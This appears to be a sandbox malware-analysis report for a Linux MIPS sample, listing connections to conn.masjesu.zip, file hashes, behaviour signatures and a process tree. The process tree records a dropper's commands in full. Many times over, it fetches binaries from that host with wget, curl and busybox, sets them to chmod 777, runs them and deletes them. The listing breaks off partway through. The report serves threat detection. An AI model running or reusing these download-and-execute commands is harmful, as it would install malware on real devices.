| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
Files
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:52
Platform
debian9-mipsel-20240729-en
Max time kernel
69s
Max time network
70s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
